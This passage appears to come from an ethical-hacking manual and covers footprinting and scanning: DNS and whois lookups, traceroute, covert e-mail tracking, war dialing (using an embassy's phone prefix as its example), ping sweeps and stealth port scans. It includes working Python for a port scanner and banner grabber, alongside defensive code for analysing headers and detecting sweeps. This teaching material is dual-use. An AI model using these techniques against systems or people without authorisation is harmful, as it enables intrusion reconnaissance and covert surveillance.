Nslookup is a program for querying Internet domain name servers. It displays information that can be used to diagnose Domain Name System (DNS) infrastructure. Once the authoritative name servers are known from whois, nslookup can be pointed at them to find additional IP addresses belonging to the domain. Querying the MX record reveals the host name, and through it the IP address, of the domain's mail server. Both UNIX and Windows ship with an nslookup client; third-party clients are also available, e.g. Sam Spade.
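To show what nslookup does underneath when it asks for an MX record, here is an added example (not part of the original manual, and not nslookup's own code) that builds a DNS query and parses a DNS response by hand, including the name-compression pointers that real answers use. The response bytes in sample_response() are constructed, using the reserved name example.test and the documentation address 192.0.2.25, so the parser can be exercised offline; query_server() sends the same query to a real resolver when you have network access.

```python
"""Build a DNS MX query and parse a DNS response (RFC 1035), including compressed names.
Added example; sample_response() is constructed, not captured from a real server."""
import socket
import struct

TYPE_A, TYPE_MX = 1, 15
CLASS_IN = 1


def encode_name(name):
    """'mail.example.test' -> b'\\x04mail\\x07example\\x04test\\x00' (RFC 1035 label format)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in labels) + b"\x00"


def build_query(name, qtype, txid=0x1234):
    """One-question standard query with the RD (recursion desired) bit set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def decode_name(msg, offset):
    """Decode a possibly compressed name; returns (name, offset just past it in the message)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:              # compression pointer (RFC 1035 section 4.1.4)
            if end is None:
                end = offset + 2               # the name ends after the first pointer
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 32:                      # a hostile response could loop pointers forever
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_response(msg):
    """Return {'mx': [(preference, exchange), ...], 'a': {host: ip}} from a DNS response."""
    _txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x000F:                         # non-zero RCODE: NXDOMAIN, SERVFAIL, REFUSED, ...
        raise ValueError("server returned rcode %d" % (flags & 0xF))
    offset = 12
    for _ in range(qd):                        # skip the echoed question section
        _, offset = decode_name(msg, offset)
        offset += 4
    result = {"mx": [], "a": {}}
    for _ in range(an + ns + ar):              # answer, authority and additional sections
        name, offset = decode_name(msg, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == TYPE_MX:
            pref = struct.unpack("!H", msg[offset:offset + 2])[0]
            exchange, _ = decode_name(msg, offset + 2)   # decoded in the whole message: it may be compressed
            result["mx"].append((pref, exchange))
        elif rtype == TYPE_A:
            result["a"][name] = ".".join(str(b) for b in msg[offset:offset + 4])
        offset += rdlen
    result["mx"].sort()
    return result


def sample_response():
    """Constructed reply to 'MX example.test': one MX answer plus the mail host's A record in
    the additional section, with compression pointers back into the question (not real data)."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 1)
    question = encode_name("example.test") + struct.pack("!HH", TYPE_MX, CLASS_IN)
    qname_ptr = struct.pack("!H", 0xC000 | 12)           # 'example.test' starts at offset 12
    mx_rdata = struct.pack("!H", 10) + b"\x04mail" + qname_ptr
    answer = qname_ptr + struct.pack("!HHIH", TYPE_MX, CLASS_IN, 3600, len(mx_rdata)) + mx_rdata
    mail_ptr = struct.pack("!H", 0xC000 | (12 + len(question) + 2 + 10 + 2))  # the '\x04mail' label
    additional = mail_ptr + struct.pack("!HHIH", TYPE_A, CLASS_IN, 3600, 4) + bytes([192, 0, 2, 25])
    return header + question + answer + additional


def query_server(name, qtype, server, timeout=3.0):
    """Send the query over UDP port 53 and parse the reply (needs network access)."""
    q = build_query(name, qtype)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(q, (server, 53))
        reply, _ = sock.recvfrom(4096)
    if reply[:2] != q[:2]:                     # transaction ID must match the query we sent
        raise ValueError("transaction id mismatch")
    return parse_response(reply)


if __name__ == "__main__":
    print(parse_response(sample_response()))
```

The additional section is why one MX query can hand you the mail server's IP address straight away: a cooperative server appends the A record for the exchange so the client need not ask again. The hop limit in decode_name() is the kind of check a parser facing untrusted responses needs, since a pointer that refers back to itself would otherwise never terminate.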
3.7 Using Sam Spade____________________________
Figure 3.2
3.7.1 Basic Configuration
Enter the address you are interested in into the address box. If you have copied an address to the clipboard you can use the paste button or menu option to paste it into the address box.
Then you can run any of the toolbar operations against that address.
The results appear in a new window. Some parts of the results may be highlighted as active text. Right-clicking the active text pops up a menu of things you can do next; left-clicking it performs the most common operation.
If you are chasing down information about the owner of an address it is handy to be able to save the useful intermediate results. The two buttons on the left of the toolbar let you copy results to the Log Window for later use.
3.7.2 Header analysis
If you have a suspicious-looking set of e-mail headers you can copy them to the clipboard from your mail reader and paste them into Sam Spade. They appear in a new window, with any addresses highlighted as active text. If you have Smart Paste enabled, Sam Spade runs a rudimentary header analysis. It is not perfect, but it can sometimes find suspicious parts of the header.
Header analysis is only useful if you paste the full set of headers, including every Received: line; most mail programs have an option to display them.
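Sam Spade's header analysis is a GUI feature, so here is an added example (not Sam Spade's code, and not part of the original manual) of the core of such an analysis in Python: walk the Received: headers from the bottom up, pull out each hop's claimed name, reverse-DNS name and IP address, and flag hops that use non-routable addresses or whose claimed name has no reverse DNS. The message in SAMPLE_HEADERS is constructed for the example and uses RFC 5737 documentation addresses; the domain names in it are invented.

```python
"""Trace the delivery path recorded in e-mail Received headers, the kind of rudimentary
analysis Sam Spade performs. Added example; SAMPLE_HEADERS is constructed (RFC 5737
documentation addresses, invented domains), not a real message."""
import ipaddress
import re

SAMPLE_HEADERS = """\
Return-Path: <alerts@secure-bank-login.example>
Received: from mx2.victim.example (mx2.victim.example [198.51.100.8])
\tby mail.victim.example with ESMTP id 7kQ2xv; Mon, 3 Jun 2024 09:12:31 +0000
Received: from relay.secure-bank-login.example (unknown [203.0.113.45])
\tby mx2.victim.example with ESMTP; Mon, 3 Jun 2024 09:12:30 +0000
Received: from mail.bank.example ([10.0.0.5])
\tby relay.secure-bank-login.example with ESMTP; Mon, 3 Jun 2024 09:12:28 +0000
From: "Bank Security" <alerts@bank.example>
To: victim@victim.example
Subject: Account verification required
"""

RECEIVED_RE = re.compile(r"^Received:\s+from\s+(?P<claimed>\S+)(?:\s+\((?P<paren>[^)]*)\))?", re.I)
IPV4_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")
# RFC 1918, loopback and link-local: a hop from one of these cannot be the Internet origin.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def unfold_headers(raw):
    """Join RFC 5322 folded continuation lines (leading whitespace) back onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def received_hops(raw):
    """Return hops oldest-first as (claimed sender name, reverse-DNS name or None, IP or None).
    Each MTA prepends its own Received header, so the bottom-most header is the first hop."""
    hops = []
    for line in unfold_headers(raw):
        m = RECEIVED_RE.match(line)
        if not m:
            continue
        paren = m.group("paren") or ""
        ip_match = IPV4_RE.search(paren) or IPV4_RE.search(m.group("claimed"))
        ip = ip_match.group(1) if ip_match else None
        rdns = paren.split()[0] if paren and not paren.startswith("[") else None
        hops.append((m.group("claimed").strip("[]"), rdns, ip))
    hops.reverse()
    return hops


def is_non_routable(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in NON_ROUTABLE)


def analyse(raw):
    """Return (origin IP to report to the network's abuse contact, list of findings)."""
    findings, origin = [], None
    for claimed, rdns, ip in received_hops(raw):
        if ip is None:
            continue
        if is_non_routable(ip):
            findings.append("hop '%s' has non-routable address %s; it sits behind the next hop" % (claimed, ip))
            continue
        if origin is None:
            origin = ip          # first hop with a public address: where the mail entered the Internet
        if rdns in (None, "unknown"):
            findings.append("%s has no reverse DNS; the name '%s' is self-asserted (HELO)" % (ip, claimed))
        elif rdns.lower() != claimed.lower():
            findings.append("%s claims to be '%s' but reverse DNS says '%s'" % (ip, claimed, rdns))
    return origin, findings


if __name__ == "__main__":
    origin, findings = analyse(SAMPLE_HEADERS)
    print("first public hop:", origin)
    for finding in findings:
        print(" -", finding)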
3.7.3 More advanced tools
There are some more sophisticated tools available on the Tools menu. Some of these may need to be enabled before you can use them.
Locate the Network Range
Commonly includes:
- Finding the range of IP addresses
- Discerning the subnet mask
Information sources:
- ARIN (American Registry for Internet Numbers)
- Traceroute
Hacking tools:
- NeoTrace
- VisualRoute
3.8 ARIN_______________________________________
ARIN allows searches of its whois database to locate information on networks, autonomous system numbers (ASNs), network-related handles and the related points of contact (POCs).
Querying ARIN whois for an IP address returns the address block it belongs to, which helps reveal how the target has divided its address space into subnets.
Figure 3.3 Screenshot: ARIN WHOIS Output
Figure 3.4
3.9 Traceroute__________________________________
Traceroute works by exploiting a feature of the Internet Protocol called TTL, or Time To Live. It reveals the path IP packets travel between two systems by sending out consecutive probes (UDP datagrams in the classic UNIX implementation; ICMP Echo Requests in the Windows tracert) with ever-increasing TTLs. Each router that forwards a packet decrements its TTL; when the TTL reaches zero the router discards the packet and sends an ICMP "Time Exceeded" message back to the originator, which therefore learns the address of the router at that hop. Routers with DNS entries reveal their names, and often their network affiliation and geographic location.
3.10 NeoTrace Pro_______________________________
NeoTrace Pro is a tool for checking information on Internet sites. You can trace any computer on the Internet simply by entering an e-mail address, IP address or URL. The display shows the route between you and the remote site, including all intermediate nodes and their registrant information.
Figure 3.5
3.11 Tool: VisualRoute Trace______________________
Figure 3.6
3.11.1 Running VisualRoute
Windows: Go to Start / Programs / VisualRoute and click on VisualRoute. If you are running under NT/Win2000, it is possible to configure VisualRoute to run as a Service.
UNIX: To run VisualRoute for UNIX, follow these steps. It is possible to configure VisualRoute to run as a daemon service that is started at system boot; refer to Appendix A for details.
- Change to the install directory: "cd vr7"
- Make sure that the current directory ('.') is in the PATH environment variable by typing "env | grep PATH". There may be two or more environment variables that have PATH in them. If it is not already there, set it with (assuming a Korn shell) "PATH=$PATH:.; export PATH".
  Note: You could also amend the profile of the account that will be running VisualRoute to include ('.') in PATH. Be aware that having '.' in PATH is a well-known security risk, because a planted executable in the current directory can shadow a system command; if you add it at all, add it last, as above, and remove it when you are done.
- If using a Java 1.1 Runtime Environment (JRE), type "jre vr" to run VisualRoute. Otherwise, type "java vr".
Mac: VisualRoute is installed in the /Applications/VisualRoute folder. Click on the VisualRoute application in this directory to start VisualRoute.
3.12 Tool: SmartWhois___________________________
Figure 3.7
Features:
- Smart operation: the program always looks up whois data in the right database; you don't have to waste your time trying them all.
- Integration with Microsoft Internet Explorer and Microsoft Outlook: look up domain owners and IP addresses in e-mail headers instantly.
- Saving results into an archive: you can build your own database that can be viewed offline.
- Batch processing of IP addresses or domain lists.
- Caching of obtained results.
- Hostname resolution and DNS caching.
- Integration with CommView Network Monitor: can be accessed from CommView for quick, easy lookup.
- Calling SmartWhois directly from your application (see the SmartWhois FAQ).
- Wildcard queries.
- Whois console for custom queries.
- Country code reference.
- Customizable interface.
- SOCKS5 firewall support.
3.13 Tool: CallerIP_______________________________
CallerIP Standard Edition allows real-time monitoring of any machine it is installed on. This lets you detect suspicious activity such as spyware and see where in the world the connections are coming from. Worldwide whois reports and network provider reports are also available for any connection.
CallerIP Advanced Edition (including all Standard features) allows you to run it as a server, so that you can monitor the connections made to and from your machines from a remote location. Automated alerts are also available, so you are notified the moment something suspicious attempts a connection to your server(s).
Figure 3.8
Plot all connections
This feature enables you to have CallerIP plot all the connections on the world
map. This in turn allows for easy and quick analysis of where connections made
to/from your machine reside.
New look table
The new look table includes gradient fills: the colour of a row in the table depends on the threat level of the connection. If the connection being made to your machine is harmless, the gradient is green. This is another quick and easy way to identify the threat of a connection.
Condensed CallerIP
CallerIP now allows you to minimize it to a very small and detailed dialog box.
The small window gives you everything you need to know but stays in the
background.
Real-time monitoring instantly identifies suspect activity and spyware
CallerIP monitors all connections to and from your system and actively scans
ports for possible back doors that allow unauthorized access.
Identifies the country of origin for all connections
A connection to/from a high-risk country is a key indicator of suspect activity and
could likely be someone looking to steal your confidential information or
compromise your system. CallerIP shows you the country location of connections
so you can identify suspect activity and protect your information.
Network Provider reporting with abuse reporting information
See the contact and abuse reporting information for the company providing
internet access for an IP address or website, so you can easily report hackers or
Internet abuse.
Worldwide Whois reports
Caller IP Pro queries worldwide databases to report the up-to-date registration
information for the 'owner' of an IP address or domain. Information includes
name, address, phone and email contact information.
Detailed log of connection history with search options
Each connection or attempted connection is automatically logged, with search
capabilities for quick lookups of past connection activity.
3.14 Tool: Mail Tracking (mailtracking.com)__________
What is MailTracking?
Mail Tracking is the most powerful and reliable email tracking service that exists
today. In short - MailTracking tells you when email you sent gets read / re-opened
/ forwarded and so much more.
How do I send a tracked email?
There are two ways you can send tracked emails:
1. Simply o (they won't see this)
or
2. Install our Active Tracker plug-in to add the tracking for you.
Testing? If you send tracked emails to yourself, your anti-spam filters may block them
(people don't usually write to themselves) - so we recommend you test by sending to
other people.
What will you tell me about the tracked emails I send?
MailTracking will endeavor to provide the following in your tracking reports:
- Date and time opened
- Location of recipient (per their ISP city/town)
- Map of location (available on paid subscriptions)
- Recipient's IP address
- Apparent email address of the opener (if available)
- Referrer details (i.e. if accessed via web mail etc.)
- URL clicks
- How long the email was read for
- How many times your email was opened
- If your email was forwarded, or opened on a different computer
All messages sent via Mail Tracking benefit from our SPF compliant and Sender-ID
compliant mail servers. This confirms safe transmission of your messages, and also
enables us to report delivery status to you (including: bounce-backs, delays and
success notifications). Delivery information is listed in your Personal Tracking Page.
Note: MailTracking.com does not use or contain any spyware, malware or viruses; it is not illegal to use, and does not breach privacy regulations in any country.
Figure 3.9
What else does Mail Tracking do?
There are lots of great features available to you; these include the following sending options:
- Certified email
- Ensured-receipts and retractable emails
- Invisible tracking
- Self-destructing emails
- Block printing
- Block forwarding
- Adobe Acrobat PDF document tracking
- Secure encrypted emails
- Track MS Word or Excel documents
You can also choose how to receive your receipts:
- In your Personal Tracking Page (when you log in)
- Email read notifications
- Legal proof-of-opening receipts
- Delivery Service Notifications (DSNs)
- SMS alert on your cell phone or pager
- Instant Messenger
These options are available to you from "My Account" in Member Utilities.
Getting started
Mail Tracking offers a lot of features and sending options, but it is very easy to use our
service. On start up, your account is already configured per our 'Recommended'
tracking defaults - and we will automatically send you email Read Notifications when
your tracked emails are opened.
3.15 Summary__________________________________
- The information gathering phase can be categorised broadly into seven phases.
- Footprinting renders a unique security profile of a target system.
- Whois and ARIN can reveal public information about a domain that can be leveraged further.
- Traceroute and mail tracking can be used to identify specific IP addresses, which may later be used for IP spoofing.
- Nslookup can reveal specific hosts, and zone transfers can compromise DNS security.
Scanning___________________________
The art of detecting which systems are alive and reachable via the Internet, and what
services they offer, using techniques such as ping sweeps, port scans, and operating
system identification, is called scanning.
3.16 Objectives of Scanning:______________________
- Detecting 'live' systems on the target network.
- Discovering services running/listening on target systems.
- Understanding port scanning techniques.
- Identifying TCP and UDP services running on the target network.
- Discovering the operating system.
- Understanding active and passive fingerprinting.
- Automated discovery tools.
3.17 Scanning is done to detect live systems on the target network in order to:
- Determine the perimeter of the target network/system
- Facilitate network mapping
- Build an inventory of accessible systems on the target network
3.18 Tools used:
- War dialers
- Ping utilities
3.18.1 War Dialers
- A war dialer is a tool used to scan a large pool of telephone numbers to detect vulnerable modems that provide access to a system.
- A demon dialer is a tool used to monitor a specific phone number and target its modem to gain access to the system.
- The threat is high in systems with poorly configured remote access products that provide entry to larger networks.
- Tools include THC-Scan, ToneLoc, TBA, etc.
Figure 3.10
War Dialers
War dialing, also called scanning, is dialing a large number of telephone numbers in the
hope of finding anything interesting. Interesting items often include test tones,
computers, Voice Mail Boxes (VMB's), Private Branch Exchanges (PBX's), and
government offices.
A common technique is to find one telephone number owned by a target and then to war
dial the entire prefix which that number belongs to. For example, if your target is the
Chinese embassy in Washington, D.C., you would dial every number starting with
(202)328. That's ten thousand numbers.
War dialing one telephone number takes approximately 35 seconds. This means that
war dialing a prefix of ten thousand numbers will take just over four days.
War dialing can be done by hand, although dialing several thousand telephone numbers
by hand is extremely boring and takes a long time. A much better strategy is to use a
war dialing program, sometimes called a war dialer or a demon dialer.
3.18.1.1 Tool: THC Scan
Figure 3.11
3.18.2 Ping
- Ping sends out an ICMP Echo Request packet and awaits an ICMP Echo Reply message from an active machine.
- Alternatively, TCP or UDP packets are sent if incoming ICMP messages are blocked.
- Ping helps in assessing network latency by time-stamping each packet.
- Ping can also be used for resolving host names.
- Tools include Pinger, WS_Ping ProPack, NetScanTools, HPing and icmpenum.
3.18.2.1 Detecting Ping Sweeps
Ping sweeps form a basic step in network mapping by polling network blocks and/or IP
address ranges.
3.18.2.2 Ping Utilities include:
- WS_PingProPack (www.ipswitch.com)
- NetScan Tools (www.nwpsw.com)
- Hping (http://www.hping.org/download.html)
- icmpenum (www.nmrc.org/files/sunix/icmpenum-1.1.1.tgz)
3.18.2.3 Ping Sweep Detection Utilities include:
- Network based IDS (www.snort.org)
- Genius (www.indiesoft.com)
- BlackICE (www.networkice.com)
- Scanlogd (www.openwall.com/scanlogd)
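The detection side, as an added example that is not part of the original manual and not the code of any tool listed above: a sliding-window ping-sweep detector in Python run over constructed iptables-style firewall log lines. It alerts when one source sends ICMP Echo Requests (type 8) to five or more distinct destinations within ten seconds, the same idea scanlogd and IDS sweep rules apply. The log format, the addresses (RFC 5737 documentation ranges), the thresholds and the year are assumptions of the example.

```python
"""Ping-sweep detection over firewall log lines, in the spirit of scanlogd and network IDS
sweep rules. Added example; SAMPLE_LOG is constructed (iptables-style kernel log format,
RFC 5737 documentation addresses), not a real capture."""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_LOG = """\
Jun  3 09:12:30 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.1 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:30 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.2 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:31 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.1 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:31 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.3 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:31 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.4 PROTO=TCP SPT=40001 DPT=80
Jun  3 09:12:32 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.4 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:32 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.1 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:33 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.5 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:33 fw kernel: IN=eth0 OUT= SRC=203.0.113.45 DST=198.51.100.6 PROTO=ICMP TYPE=8 CODE=0
Jun  3 09:12:34 fw kernel: IN=eth0 OUT= SRC=198.51.100.77 DST=198.51.100.1 PROTO=ICMP TYPE=8 CODE=0
"""

LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+\S+\s+kernel:"
    r".*?\bSRC=(?P<src>[\d.]+)\s+DST=(?P<dst>[\d.]+).*?\bPROTO=(?P<proto>\w+)(?:\s+TYPE=(?P<type>\d+))?")
MONTHS = {m: i for i, m in enumerate(
    ("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"), start=1)}
LOG_YEAR = 2024   # syslog timestamps carry no year; assumed for the sample


def parse_line(line):
    """Return (epoch seconds, src, dst, proto, icmp_type or None), or None for non-packet lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hh, mm, ss = (int(x) for x in m.group("time").split(":"))
    ts = datetime(LOG_YEAR, MONTHS[m.group("mon")], int(m.group("day")), hh, mm, ss).timestamp()
    icmp_type = int(m.group("type")) if m.group("type") else None
    return ts, m.group("src"), m.group("dst"), m.group("proto"), icmp_type


def detect_ping_sweeps(lines, threshold=5, window=10.0):
    """Alert on a source that sent ICMP Echo Requests (type 8) to at least `threshold` distinct
    destinations within any `window` seconds. Returns {src: distinct destinations at alert time}."""
    recent = defaultdict(deque)       # src -> deque of (ts, dst) still inside the sliding window
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dst, proto, icmp_type = parsed
        if proto != "ICMP" or icmp_type != 8:
            continue                  # echo replies, TCP and UDP are not part of an echo sweep
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()               # drop probes that fell out of the window
        distinct = {d for _, d in q}
        if len(distinct) >= threshold and src not in alerts:
            alerts[src] = len(distinct)
    return alerts


if __name__ == "__main__":
    for src, n in detect_ping_sweeps(SAMPLE_LOG.splitlines()).items():
        print("ping sweep from %s: %d hosts probed" % (src, n))
```

The monitoring host 198.51.100.77 pings the same gateway repeatedly and is never flagged, because the detector counts distinct destinations rather than packets; that distinction is what keeps the rule quiet on normal traffic. A slow sweep spread over hours stays below the window, which is why attackers throttle their sweeps and why defenders also keep longer-term counts per source.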
3.19 Hacking Tool: Pinger________________________
Pinger is one of the fastest ICMP sweep scanners. Its advantage lies in its ability to send multiple ICMP Echo Request packets concurrently and wait for the responses. It also allows you to resolve host names and save the output to a file. Blocking ICMP sweeps at the perimeter is straightforward: do not allow ICMP Echo Requests into your network from the outside.
If you are still not convinced that you should block ICMP Echo Requests, bear in mind that an attacker can also send them to broadcast addresses, so that a single packet elicits replies from every host on a subnet.
Figure 3.12
3.20 Hacking Tool: WS_Ping_Pro__________________
WS_Ping ProPack is an integrated set of Internet diagnostic and information tools.
WS_Ping ProPack provides an easy-to-use graphical interface to the most commonly
used Internet tools, including Ping, Traceroute, DNS lookup, Finger, Whois, LDAP,
SNMP tools. This set of tools helps you quickly track down network problems and find
information about users, hosts, and networks on the Internet (or on an intranet). In
addition, WS_Ping ProPack lets you test web addresses, synchronize your local
computer with a time server, and test the throughput on a connection.
WS_Ping ProPack runs on Windows 98, 95, 2000, and Windows NT systems and can
query any device on a TCP/IP network, including PCs, UNIX systems, and routers.
Figure 3.13
3.21 Port Scanning______________________________
A port scan is one of the most popular reconnaissance techniques attackers use to discover services they can break into. All machines connected to a Local Area Network (LAN) or the Internet run many services that listen on well-known and not-so-well-known ports. A port scan helps the attacker find which ports are available (i.e., what service might be listening on a port). Essentially, a port scan consists of sending a message to each port, one at a time. The kind of response received indicates whether the port is in use and can therefore be probed further for weaknesses.
A port scan is like ringing the doorbell to see whether someone is at home. The police usually cannot do anything about it; they have to wait until a crime is committed. They might give it more consideration if the doorbell is rung repeatedly and the homeowner complains of harassment. Sometimes, if a computer system is affected too much by a port scan, one can argue that the port scan was in fact a denial-of-service (DoS) attack, which is usually an offence.
3.22 TCP's 3-Way Handshake_____________________
The TCP connection establishment process is called "the three-way handshake" and consists of three segments:
1. The client sends a SYN segment specifying the port number of the server it wants to connect to, together with the client's initial sequence number (ISN).
2. If the server's service (port) is active, the server responds with its own SYN segment containing the server's initial sequence number. The server also acknowledges the client's SYN by ACKing the client's ISN + 1. If the port is not active, the server sends a RESET (RST) segment, which aborts the connection attempt.
3. The client acknowledges the server's SYN by ACKing the server's ISN + 1.
When is a RESET sent? Whenever an arriving segment does not appear correct for the referenced connection, i.e. the connection identified by the destination IP address and port number together with the source IP address and port number.
Figure 3.14
3.22.1 TCP Scan Types
The simplest port scan tries each of the ports from 0 to 65535 on the victim (i.e., sends a carefully constructed packet with that destination port number) to see which ones are open.
3.22.2 TCP connect()
The connect() system call provided by the OS is used to open a connection to every interesting port on the machine. If the port is listening, connect() succeeds; if the target answers with a RST, the port is closed; and if nothing comes back before the timeout, the port is filtered, usually because a firewall dropped the probe.
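An added example (not part of the original manual and not the code of any scanner it names) of the connect() scan just described, in Python: each probe completes the three-way handshake, so connect() succeeding means "open", a RST means "closed", and silence until the timeout means "filtered". Because the handshake completes, the target's accept() sees every probe, which is why connect() scans end up in service logs and why attackers prefer the half-open SYN scan; a SYN scan needs raw sockets (e.g. nmap -sS) and is not shown here. To run offline the example opens its own listener on 127.0.0.1 with a constructed SMTP-style banner and scans that port plus one it knows is closed.

```python
"""TCP connect() port scanner with banner grabbing. Added example: it scans only ports on
127.0.0.1 that the script itself opens (or knows to be closed), so it runs offline."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe_tcp(host, port, timeout=1.0):
    """Attempt a full three-way handshake with connect().
    'open'     - SYN/ACK came back and the handshake completed
    'closed'   - the target answered the SYN with RST (connection refused)
    'filtered' - nothing came back before the timeout (typically a firewall dropping the SYN)"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except OSError:                   # includes socket.timeout / TimeoutError
        return "filtered"
    finally:
        sock.close()


def scan(host, ports, timeout=1.0, workers=20):
    """Probe the given ports concurrently; returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_tcp(host, p, timeout), ports))
    return dict(zip(ports, states))


def grab_banner(host, port, timeout=1.0, nbytes=256):
    """Read the service's greeting, if it sends one (SMTP, FTP and SSH announce themselves)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        try:
            return sock.recv(nbytes).decode("ascii", errors="replace").strip()
        except OSError:
            return ""


def start_listener(banner=b"220 mail.example.test ESMTP ready\r\n"):
    """Listen on an ephemeral loopback port and greet each client with `banner`
    (a constructed stand-in for a mail server). Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()    # a connect() scan shows up here, and in the server's logs
            except OSError:
                return                    # listener shut down
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port():
    """Bind to port 0 to get a free port from the OS, then release it: nothing listens there."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Scan one open and one closed loopback port; returns (open state, closed state, banner)."""
    srv, open_port = start_listener()
    closed_port = unused_port()
    try:
        results = scan("127.0.0.1", [open_port, closed_port])
        banner = grab_banner("127.0.0.1", open_port) if results[open_port] == "open" else ""
    finally:
        try:
            srv.shutdown(socket.SHUT_RDWR)   # wakes the blocked accept() so the thread exits
        except OSError:
            pass
        srv.close()
    return results[open_port], results[closed_port], banner


if __name__ == "__main__":
    print(demo())
```

For a real target you replace the loopback host and port list, e.g. scan("198.51.100.10", range(1, 1025)); keep the worker count modest so that you do not exhaust your own ephemeral ports or trip the target's connection-rate limits. Note that "filtered" is a statement about the absence of a reply within the timeout, so a slow link can make an open port look filtered; rescanning the filtered ports with a longer timeout is the usual check.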
3.22.3 Strobe
A strobe does a narrower scan, only looking for those services the attacker knows how
to exploit. The name comes from one of the original TCP scanning programs, though
now virtually all scanning tools include this feature.
3.22.4 Stealth port scan
One problem, from the perspective of the attacker attempting to scan a port, is that
services listening on these ports log scans. They see an incoming connection, but no
data, so an error is logged. There exist a number of stealth scan techniques to avoid
this. A stealth scan is a kind of scan that is designed to go undetected by auditing tools.
Obviously, this is a race between the hacker and firewall vendors - what are considered
stealth scans now may not be so in a few months once the firewall vendor becomes
aware of such techniques.
3.22.5 Fragmented packet Port Scan
The scanner splits the TCP header into several IP fragments. This bypasses some
packet filter firewalls because they cannot see a complete TCP header that can match
their filter rules. Some packet filters and firewalls do queue all IP fragments, but many
networks cannot afford the performance loss caused by the queuing.
3.22.6 SYN scan
This technique is also called half-open scanning, because the TCP connection is never completed. A SYN packet is sent (as if we were going to open a connection); a SYN+ACK from the target indicates the port is listening, and a RST indicates a non-listener. On receiving the SYN+ACK the scanner sends a RST instead of the final ACK, so the handshake never completes and the server application is never informed by the TCP layer. Crafting the raw SYN and RST packets requires privileged (raw socket) access on the scanning host.
3.22.7 FIN scan
The typical TCP scan attempts to open connections (at least part way). Another
technique sends erroneous packets at a port, expecting that open listening ports will
send back different error messages than closed ports. The scanner sends a FIN
packet, which should close a connection that is open. Closed ports reply to a FIN
packet with a RST. Open ports, on the other hand, ignore the packet in question. This is
required TCP behavior. If no service is listening at the target port, the operating system
will generate an error message. If a service is listening, the operating system will silently
drop the incoming packet. Therefore, silence indicates the presence of a service at the
port. However, since packets can be dropped accidentally on the wire or blocked by
firewalls, this isn't a very effective scan.
Other techniques that have been used consist of XMAS scans where all flags in the
TCP packet are set, or NULL scans where none of the bits are set. However, different
operating systems respond differently to these scans, and it becomes important to
identify the OS and even its version and patch level.
3.22.8 UDP SCANNING_________________________________
Port scanning usually means scanning for TCP ports, which are connection-oriented
and therefore give good feedback to the attacker. UDP responds in a different manner.
In order to find UDP ports, the attacker generally sends empty UDP datagrams. If the
port is listening, the service should send back an error message or ignore the incoming
datagram. If the port is closed, then most operating systems send back an "ICMP Port
Unreachable" message. Thus, you can find out if a port is NOT open, and by exclusion
